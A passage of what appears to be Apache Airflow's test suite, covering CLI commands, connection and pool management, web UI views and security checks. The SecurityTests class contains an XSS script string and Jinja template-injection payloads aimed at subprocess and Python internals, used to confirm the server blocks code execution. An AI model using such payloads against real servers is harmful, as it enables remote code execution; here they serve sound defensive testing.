super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
from airflow.www_rbac import app as application
configuration.load_test_config()
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator', ]))
args = self.parser.parse_args(['list_dag_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test1', '--lastname', 'doe',
'--firstname', 'jon',
'--email', '[email protected]', '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test2', '--lastname', 'doe',
'--firstname', 'jon',
'--email', '[email protected]', '--role', 'Viewer', '--password', 'test'
])
cli.users(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test3', '--lastname', 'doe',
'--firstname', 'jon',
'--email', '[email protected]', '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
args = self.parser.parse_args([
'users', '-d', '--username', 'test3',
])
cli.users(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'users', '-c', '--username', 'user{}'.format(i), '--lastname',
'doe', '--firstname', 'jon',
'--email', 'jdoe+{}@gmail.com'.format(i), '--role', 'Viewer',
'--use_random_password'
])
cli.users(args)
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.users(self.parser.parse_args(['users', '-l']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_sync_perm(self):
# test whether sync_perm cli will throw exceptions or not
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connnection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_parentdag_downstream_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm',
'--exclude_parentdag'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator',
'-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_pool_import_export(self):
# Create two pools first
pool_config_input = {
"foo": {
"description": "foo_test",
"slots": 1
},
"baz": {
"description": "baz_test",
"slots": 2
}
}
with open('pools_import.json', mode='w') as f:
json.dump(pool_config_input, f)
# Import json
try:
cli.pool(self.parser.parse_args(['pool', '-i', 'pools_import.json']))
except Exception as e:
self.fail("The 'pool -i pools_import.json' failed: %s" % e)
# Export json
try:
cli.pool(self.parser.parse_args(['pool', '-e', 'pools_export.json']))
except Exception as e:
self.fail("The 'pool -e pools_export.json' failed: %s" % e)
with open('pools_export.json', mode='r') as f:
pool_config_output = json.load(f)
self.assertEqual(
pool_config_input,
pool_config_output,
"Input and output pool files are not same")
os.remove('pools_import.json')
os.remove('pools_export.json')
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except Exception:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except Exception:
# exception is expected here since dag doesnt exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run,
# and the text of the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=missing_dag',
follow_redirects=True)
self.assertIn("seems to be missing", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=section-1-task-1&"
"dag_id=example_subdag_operator.section-1&future=false&past=false&"
"upstream=false&downstream=true&recursive=true&"
"execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.end",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1.section-1-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-3",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-4",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-5",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.some-other-task",
response.data.decode('utf-8'))
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
